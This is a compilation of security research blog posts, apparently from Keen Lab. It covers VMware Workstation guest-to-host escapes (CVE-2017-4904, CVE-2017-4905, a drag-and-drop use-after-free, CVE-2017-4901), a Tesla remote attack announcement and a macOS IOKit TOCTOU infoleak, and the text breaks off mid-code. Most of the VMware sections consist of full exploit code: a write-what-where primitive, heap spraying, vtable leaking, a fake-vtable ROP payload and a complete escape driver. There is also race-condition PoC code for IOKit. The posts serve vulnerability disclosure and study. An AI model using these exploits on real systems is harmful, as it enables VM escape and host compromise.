Basically at the lower level, the backdoor consists of 2 IO ports 0x5658 and 0x5659, the first for “traditional” communication, the other one for “high bandwidth” ones.

The guest issues in/out instructions on those ports with some registers convention and it’s able to communicate with the VMware running on the host.

The hypervisor will trap and service the request.

On top of this low level mechanism, vmware implemented some more convenient high level protocols, we encourage you to check the open-vm-tools repository to discover those since they were covered extensively elsewhere we will not spend too much time covering the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

It’s a interface guest-host that we can use
It exposes complex services and functionalities.
Lot of these functionalities can be used from ring3 in the guest VM

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

1	00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations such as CFG, Microsoft version of Control Flow Integrity and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.
ZDIThe Security Landscape: Pwn2Own 2017

The following vulnerabilities were identified and analyzed:
XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution
CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure
ZDI THE RESULTSPWN2OWN 2017 DAY THREE

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory.

The XHCI reports some status info to system software through “Device Context” structure. The address of a Device Context is in the DCBAA (Device Context Base Address Array), whose address is in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and DCBAA resides in the physical RAM. And the XHCI device will keep an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However the mapping could fail and leave the result variable untouched. The code does not take precaution against it and directly uses the result as a destination address for memory writing, resulting an uninitialized variable vulnerability.

To trigger this bug, the following steps should be taken:

Issue a “Enable Slot” command to XHCI. Get the result slot number from Event TRB.
Set the DCBAAP to point to a controlled buffer.
Put some invalid physical address, eg. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
Issue an “Address Device” command. The XHCI will read the base address of Device Context from DCBAA to an internal cache and the value is an controlled invalid address.
Issue an “Configure Endpoint” command. Trigger the bug when XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Context of the Input Context which is also on the stack. Therefore we can control the destination address of the write. And the contents to be written are from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting a write-what-where primitive. By combining with the info leak vulnerability, we can overwrite some function pointers and finally rop to get arbitrary code execution.

Exploit code

void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer will be allocated on the stack when processing the backdoor requests. This buffer should be initialized in the BDOORHB callback. But when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The successful rate to exploit this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    // 
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

By fuzzing VMware workstation, we found this bug and complete the whole stable exploit chain using this single bug in the last few days of Feb. 2017. Unfortunately this bug was patched in VMware workstation 12.5.3 released on 9 Mar. 2017. After we noticed few papers talked about this bug, and VMware even have no CVE id assigned to this bug. That’s such a pity because it’s the best bug we have ever seen in VMware workstaion, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

This exploit successful rate is approximately 100%.

char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
               Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.
VMware Workstation and Fusion updates address out-of-bounds memory access vulnerabilitywww.vmware.com/security/advisories/VMSA-2017-0005.html

After VMware released 12.5.3, we continued auditing the DnD and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known by almost every participants of VMware category in Pwn2own 2017. Here we present the PoC of this bug.

void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}

Conclusions

In this article we presented several VMware bugs leading to guest to host virtual machine escape.
We hope to have demonstrated that not only VM breakouts are possible and real, but also that a determined attacker can achieve multiple of them, and with good reliability.
We feel that in our industry there is the misconception that if untrusted software runs inside a VM, then we will be safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud which basically runs on hypervisors.
For sure it’s an additional protection layer, raising the bar for an attacker to get full compromise, so it’s a very good practice to adopt it.
But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure also this security layer.

New Car Hacking Research: 2017, Remote Attack Tesla Motors Again

2017-07-27T13:22:42.000Z

Keen Lab discovered new security vulnerabilities on Tesla motors and realized full attack chain to implement arbitrary CAN BUS and ECUs remote controls on Tesla motors with latest firmware.

Several highlights for 2017 Tesla Research:

Realized full attack chain as we did in year 2016 to implement arbitrary CAN BUS and ECUs remote controls.
Discovered multiple 0Days in different modules. Currently, Keen Lab is working with Tesla and related manufactures on assigning CVE number of the vulnerabilities.
Tesla implemented a new security mechanism “code signing” to do signature integrity check of system firmware that will be FOTAed to Tesla motors in Sept 2016. The code signing was bypassed by Keen Lab.
The “Group lighting show of Model X” in our demonstration is technically arbitrary remote controls on multiple ECUs at the same time. It shows Keen Lab’s research capability on CAN BUS and ECUs.

Keen Lab has followed “responsible disclosure” process to reported all security vulnerabilities and related exploitations to Tesla. Tesla Product Security Team has verified and confirmed all the bugs in our report. Security patches have been made and updated to motors via FOTA efficiently in July. The reported issues affect multiple models of Tesla motors. Based on Tesla’s report, most of the active Tesla motors have been updated to new firmware with patches via FOTA. We appreciate Tesla Product Security Team for their quick response, quick fix and efficient patching via FOTA.

Reminder to Tesla car owners: Please check if your car is with the firmware version 8.1 (17.26.0) or later. If NOT, please upgrade to the latest firmware to ensure all the issues are fixed.

The video below demonstrates the impact of our remote attack vector. REMINDER: WHAT YOU ARE ABOUT TO SEE IN THIS VIDEO ARE PERFORMED BY PROFESSIONAL RESEARCHERS, DO NOT TRY THIS AT HOME. Appreciate Tencent Auto for the contributions on publishing this demonstration.

Racing for everyone: descriptor describes TOCTOU in Apple's core

2017-01-09T07:07:42.000Z

This blog post is about a new type of vulnerabilities in IOKit I discovered and submitted to Apple in 2016. I did a brief scan using a IDA script on MacOS and found at least four bugs with 3 CVEs assigned (CVE-2016-7620/4/5), see https://support.apple.com/kb/HT207423. I was told afterwards that there’re even more issues of this type on iOS’/OSX’s IOKit drivers and fortunately Apple fixed them also.

Lecture time: IOKit revisited

Recall the old userspace iokit call entry method:

1709 kern_return_t1710 IOConnectCallMethod(1711    mach_port_t  connection,        // In1712    uint32_t     selector,      // In1713    const uint64_t  *input,         // In1714    uint32_t     inputCnt,      // In1715    const void  *inputStruct,       // In1716    size_t       inputStructCnt,    // In1717    uint64_t    *output,        // Out1718    uint32_t    *outputCnt,     // In/Out1719    void        *outputStruct,      // Out1720    size_t      *outputStructCntP)  // In/Out1721 {//...1736     if (inputStructCnt <= sizeof(io_struct_inband_t)) {1737    inb_input      = (void *) inputStruct;1738    inb_input_size = (mach_msg_type_number_t) inputStructCnt;1739     }1740     else {1741    ool_input      = reinterpret_cast_mach_vm_address_t(inputStruct);1742    ool_input_size = inputStructCnt;1743     }1744 //...1770    else if (size <= sizeof(io_struct_inband_t)) {1771        inb_output      = outputStruct;1772        inb_output_size = (mach_msg_type_number_t) size;1773    }1774    else {1775        ool_output      = reinterpret_cast_mach_vm_address_t(outputStruct);1776        ool_output_size = (mach_vm_size_t)    size;1777    }1778     }1779 1780     rtn = io_connect_method(connection,         selector,1781                (uint64_t *) input, inputCnt,1782                inb_input,          inb_input_size,1783                ool_input,          ool_input_size,1784                inb_output,         &inb_output_size,1785                output,             outputCnt,1786                ool_output,         &ool_output_size);1787 //...1795     return rtn;1796 }

If the inputstruct is larger than sizeof(io_struct_inband_t), the passed in argument will be casted to a mach_vm_address_t, otherwise just a native pointer.

Is this one race-able? No? Is that one race-able?

For a curious mind one would like to ask, if there exists any possibility that this can be modified to lead to TOCOU? Historical vulnerabilities focuses on racing memories shared via IOConnectMapMemory, whose meaning is very obvious according to this name (see Pangu’s and Ian Beer‘s ) research), however these kinds of vulns are mostly eliminated now.

Eyes turned to these simple and naive IOKit arguments, are these benign little spirits even race-able?

Lets see how these arguments are passed from userspace to kernel space.

In MIG trap defs and generated code, different input types are dealt in different ways.

601602routine io_connect_method(603     connection      : io_connect_t;604 in  selector        : uint32_t;605606 in  scalar_input    : io_scalar_inband64_t;607 in  inband_input    : io_struct_inband_t;608 in  ool_input       : mach_vm_address_t;609 in  ool_input_size  : mach_vm_size_t;610611 out inband_output   : io_struct_inband_t, CountInOut;612 out scalar_output   : io_scalar_inband64_t, CountInOut;613 in  ool_output      : mach_vm_address_t;614 inout ool_output_size   : mach_vm_size_t615 );616

The following code is generated:

/* Routine io_connect_method */mig_external kern_return_t io_connect_method(    mach_port_t connection,    uint32_t selector,    io_scalar_inband64_t scalar_input,    mach_msg_type_number_t scalar_inputCnt,    io_struct_inband_t inband_input,    mach_msg_type_number_t inband_inputCnt,    mach_vm_address_t ool_input,    mach_vm_size_t ool_input_size,    io_struct_inband_t inband_output,    mach_msg_type_number_t *inband_outputCnt,    io_scalar_inband64_t scalar_output,    mach_msg_type_number_t *scalar_outputCnt,    mach_vm_address_t ool_output,    mach_vm_size_t *ool_output_size){//...    (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);//...    if (inband_inputCnt > 4096) {        { return MIG_ARRAY_TOO_LARGE; }    }    (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);//...    InP->ool_input = ool_input;    InP->ool_input_size = ool_input_size;

OK, seems scala-input and struct-input with size < 4096 are copied and bundled inband of the mach-msg, then passed into kernel space. No way.

However, Struct-input with size > 4096 remains mach_vm_address and is untouched.

Now lets dive into kernel space

3701 kern_return_t is_io_connect_method3702 (3703    io_connect_t connection,3704    uint32_t selector,3705    io_scalar_inband64_t scalar_input,3706    mach_msg_type_number_t scalar_inputCnt,3707    io_struct_inband_t inband_input,3708    mach_msg_type_number_t inband_inputCnt,3709    mach_vm_address_t ool_input,3710    mach_vm_size_t ool_input_size,3711    io_struct_inband_t inband_output,3712    mach_msg_type_number_t *inband_outputCnt,3713    io_scalar_inband64_t scalar_output,3714    mach_msg_type_number_t *scalar_outputCnt,3715    mach_vm_address_t ool_output,3716    mach_vm_size_t *ool_output_size3717 )3718 {3719     CHECK( IOUserClient, connection, client );3720 3721     IOExternalMethodArguments args;3722     IOReturn ret;3723     IOMemoryDescriptor * inputMD  = 0;3724     IOMemoryDescriptor * outputMD = 0;3725 //...3736     args.scalarInput = scalar_input;3737     args.scalarInputCount = scalar_inputCnt;3738     args.structureInput = inband_input;3739     args.structureInputSize = inband_inputCnt;3740 3741     if (ool_input)3742    inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,3743                            kIODirectionOut, current_task());3744 3745     args.structureInputDescriptor = inputMD;//...3753     if (ool_output && ool_output_size)3754     {3755    outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,3756                            kIODirectionIn, current_task());//...3774     return (ret);3775 }

Seems Apple and Linus take a different approach here. In Linux kernel, usually incoming userspace content are copied to kernel-allocated memory content using copy_from_user. However here the Apple kernel directly creates a memory descriptor using the userspace address, rather than creating a copy.

So can we modify this memory content in userspace after it’s passed to kernel via IOKit call?

Surprisingly, the answer is yes!

This means, for a IOKit call, if the corresponding IOService accepts input memory descriptor, the userspace program can alter the content while the IOService is processing it, no lock, no write prevention. Juicy place for racing conditions and TOCTOUs(Time to check before time to use) :) After this bug is fixed I talked to security folks at Apple and they said even they didn’t realized the descriptor mapped memory is writable by userspace.

I quickly identified several potential vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface, one of them (CVE-2016-7624) is described below. And there’re far more patterns than that, using your imagination :)

TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox

There exists an TOCTOU in IOCommandQueue::submit_command_buffer. This function accepts either inband struct or structureInputDescriptor. Data controlled by attacker is passed into the function and at certain offset a value is used as length. The length is validated but due to the nature of MemoryDescriptor, client can still change the value when its actually used by modifying the mapped memory, causing TOCTOU that lead to information disclosure or other possible oob write.

Analysis

IOAccelCommandQueue::s_submit_command_buffers accept user input IOExternalMethodArguments, and if structureInputDescriptor is passed in from a userspace mapped address, it will use structureInputDescriptor and get a IOMemoryMap then get its address and use it. But nothing prevents userspace from modifying the content represented by the address, lead to TOCTOU.

__int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3){  IOExternalMethodArguments *v3; // r12@1  IOAccelCommandQueue *v4; // r15@1  unsigned __int64 inputdatalen; // rsi@1  unsigned int v6; // ebx@1  IOMemoryDescriptor *v7; // rdi@3  __int64 v8; // r14@3  __int64 inputdata; // rcx@5  v3 = a3;  v4 = this;  inputdatalen = (unsigned int)a3->structureInputSize;  v6 = -536870206;  if ( inputdatalen >= 8    && inputdatalen - 8 == 3                         * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )  {    v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;    v8 = 0LL;    if ( v7 )    {      v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);      v6 = -536870200;      if ( !v8 )        return v6;      inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);      LODWORD(inputdatalen) = v3->structureInputSize;    }

We can see that at offset+4, a DWORD is retrived as length and compared with ((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)

And then this length offset is used again in submit_command_buffer. See the following code:

  if ( *((_QWORD *)this + 160) )  {    v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);    if ( v5 )    {      IOAccelShared2::processResourceDirtyCommands(v5);      IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);      if ( *(_DWORD *)(input + 4) )      {        v6 = (unsigned __int64 *)(input + 24);        v7 = 0LL;        do        {          IOAccelCommandQueue::submitCommandBuffer(            (IOAccelCommandQueue *)v2,            *((_DWORD *)v6 - 4),//v6 based on input            *((_DWORD *)v6 - 3),//based on input            *(v6 - 1),//based on input            *v6);//based on input          ++v7;          v6 += 3;        }        while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE      }

Notice in line 23 that *(input+4) is accessed again as loop boundary. However if user passes in a descriptor, then he can modify it at userland and bypass the check in s_submit_command_buffers, cause the loop to go out-of-bound.

In IOAccelCommandQueue::submitCommandBuffer, in the following statement:

    IOGraphicsAccelerator2::sendBlockFenceNotification(      *((IOGraphicsAccelerator2 **)this + 166),      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),      data_from_input_add_24_minus_8,      0LL,      v13);    result = IOGraphicsAccelerator2::sendBlockFenceNotification(               *((IOGraphicsAccelerator2 **)this + 166),               (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),               data_from_input_add_24,               0LL,               v13);

The memory content is sent back to user space if a notification callback is installed. So if an attacker can carefully control some sensitive memory to place after the mapped descriptor memory, the OOB can get this content back to userspace, lead to infoleak.

The exploit steps are

Userspace program mmaps memory page, pass it as iokit call argument structureInputDescriptor
s_submit_command_buffer validates at +4 the content is legal compared to the total incoming structureInput length
submit_command_buffer iterates the passed in descriptor memory from userspace, using the +4 as boundary length indicator. Memory content readed is calculated in submitCommandBuffer and send back to userspace via installed asyncNotificationPort.
Userspace program races to modify this +4 offset value, causing the loop to go out-of-bound, leaking adjacent memory in Kernel address space.

Notice that the inputdatelen is first retrieved from structureInputSize, so we cannot directly use the IOConnectCallMethod API. Because in this API, structureInput and structureInputDescriptor cannot be passed at same time.

Instead we directly call _io_connect_method private function in IOKit framework, which accepts structureInput and structureInputDescriptor at same time.

POC code

POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is one simplified version:

volatile unsigned int secs = 10;void modifystrcut(){    *((unsigned int*)(input+4)) = 0x7fffffff;    printf("secs %x\n", secs);}    //...int main(int argc, const char * argv[]) {    io_iterator_t iterator;    //...    getFunc();    io_connect_t conn;    io_service_t svc;    //...    IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);    svc = IOIteratorNext(iterator);    printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);    //...    io_connect_t sharedconn;    IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);    IOConnectAddClient(conn, sharedconn);    //then set async ref    ref = IONotificationPortCreate(kIOMasterPortDefault);    port = IONotificationPortGetMachPort(ref);    pthread_t rt;    pthread_create(&rt, NULL, gaorunloop, NULL);        io_async_ref64_t asyncRef;    asyncRef[kIOAsyncCalloutFuncIndex] = callback;    asyncRef[kIOAsyncCalloutRefconIndex] = NULL;    //...    const uint32_t outputcnt = 0;    const size_t outputcnt64 = 0;    IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);    //...    size_t i=0;    input = dommap();    {        char* structinput = input;    *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?    size_t outcnt = 0;    }        //...    const size_t bufsize = 4088;    char buf[bufsize];    memset(buf, 'a', sizeof(buf)*bufsize);    size_t outcnt =0;    *((unsigned int*)(buf+4)) = 0xaa;        //...    {        pthread_t t;        pthread_create(&t, NULL, modifystrcut, NULL);    //...    io_connect_method(                      conn,                      1,                      NULL,//input                      0,//inputCnt                      buf,//inb_input                      bufsize,//inb_input_size                      reinterpret_cast_mach_vm_address_t(input),//ool_input                      